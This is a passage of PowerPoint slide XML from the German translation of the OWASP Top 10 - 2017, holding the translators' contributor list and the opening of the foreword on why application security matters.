        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3112264">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2940710">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="216000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pP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t>Christian Dresen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90488" marR="0" indent="-825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1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dr. Thomas Herzog</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950">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00">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Alexios </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fakos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (Synopsys)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90488" marR="0" indent="-825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1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dr. Markus </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Koegel</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" baseline="0">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00">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Louisa Frick (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CycleSEC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> GmbH)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" baseline="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Tobias </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Glemser</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" baseline="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dr. Frank Gut (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hochschule Furtwangen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="88900" marR="0" indent="-889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1163638" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dr. Ingo Hanke (SMA Solar Technology AG)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90488" marR="0" indent="-825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1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pP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t>Sebastian Klipper (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CycleSEC</a:t>
                      </a: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t> GmbH)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="90488" marR="0" indent="-825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1077913" algn="l"/>
                          <a:tab pos="1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pP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t>Jens </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Liebau</a:t>
                      </a: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50" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>bitinspect</a:t>
                      </a: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t> GmbH)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="90488" marR="0" indent="-825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1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pP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t>Ralf Reinhardt </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(sic[!]sec GmbH)</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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90488" marR="0" indent="-825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1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pP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t>Martin Riedel (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>codecentric</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> AG)</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="95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90488" marR="0" indent="-825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1258888" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pP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t>Michael Schaefer (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SCHUTZWERK GmbH)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custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87292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310429938"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8968713"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="339336">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Vorwort</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225200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Seit längerer Zeit gefährdet unsichere Software unsere Finanz-, Gesundheits-, Verteidigungs-, Energie- sowie weitere kritische Infrastrukturen. Während unsere digitale Infrastruktur zunehmend komplex und vernetzt wird, wächst der Aufwand für Anwendungssicherheit exponentiell. Das schnelle Tempo moderner Softwareentwicklungsprozesse macht es dabei zwingend notwendig die häufigsten Schwachstellen schnell und zuverlässig zu entdecken. Wir können es uns schlicht nicht länger leisten, einfache Sicherheitsprobleme, wie die hier beschriebenen OWASP Top 10, zu ignorieren. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Während der Erstellung dieser OWASP Top 10 - 2017 haben wir etliche Rückmeldungen erhalten. Weit mehr als es bei all den anderen OWASP Projekten die Regel ist. Dies zeigt, wie viel Leidenschaft die Community für die OWASP Top 10 hegt und belegt ebenfalls wie wichtig es für OWASP ist, eine für den überwiegenden Teil der Anwendungsfälle passende Top 10 zu erarbeiten.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Auch wenn das ursprüngliche Ziel des OWASP Top 10 Projekt lediglich darin bestand, die Kenntnis über Sicherheitslücken unter Entwicklern und Managern zu verbreiten, so ist es inzwischen - der - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
                        <a:t>defacto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t> Sicherheitsstandard für Anwendungen geworden.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>In dieser Auflage, sind Sicherheitsrisiken und Empfehlungen nachvollziehbar präzisiert, um den Einsatz der OWASP Top 10 zu erleichtern. Wir fordern große oder besonders leistungsfähige Organisationen auf den </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Verification</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="sng" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0"/>
                        <a:t> zu nutzen. Für die meisten ist die OWASP Top 10 jedoch ein guter erster Schritt auf der Reise nach mehr Anwendungssicherheit.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0"/>
                        <a:t>Über die OWASP Top 10 hinaus existieren weitere Handreichungen für unterschiedliche Nutzer: So richtet sich </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Nächste Schritte für Software-Entwickler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Nächste Schritte für Sicherheitstester</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" b="0" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Nächste Schritte für Organisationen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0"/>
                        <a:t> primär an CIOs und CISOs, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Nächste Schritte für Anwendungs-Verantwortliche</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0"/>
                        <a:t> eher an zuständige</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" baseline="0" noProof="0" dirty="0"/>
                        <a:t> IT-Mitarbeiter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Langfristig möchten wir Sie ermuntern, Ihre eigene Richtlinie zur Anwendungssicherheit zu erstellen, die zu Ihrer Firmenkultur und Technologie passt. Eine solche Richtlinie kann es in allen möglichen Varianten geben. Nutzen Sie die bestehenden Kompetenzen in Ihrer Organisation, um die Anwendungssicherheit auch mit Hilfe des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:uFill>
                            <a:solidFill>
                              <a:srgbClr val="0066FF"/>
                            </a:solidFill>
                          </a:uFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Software Assurance Maturity Model (OWASP-SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>-Projekts zu verbessern.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>Wir hoffen, dass die OWASP Top 10 Ihnen bei der Verbesserung der Anwendungssicherheit helfen. Bei Fragen, Kommentare und Ideen besuchen Sie gerne die </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                        <a:t>-Projektseite der englischen Original-Version:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buSzPct val="100000"/>
                        <a:buChar char="•"/>
                        <a:defRPr sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
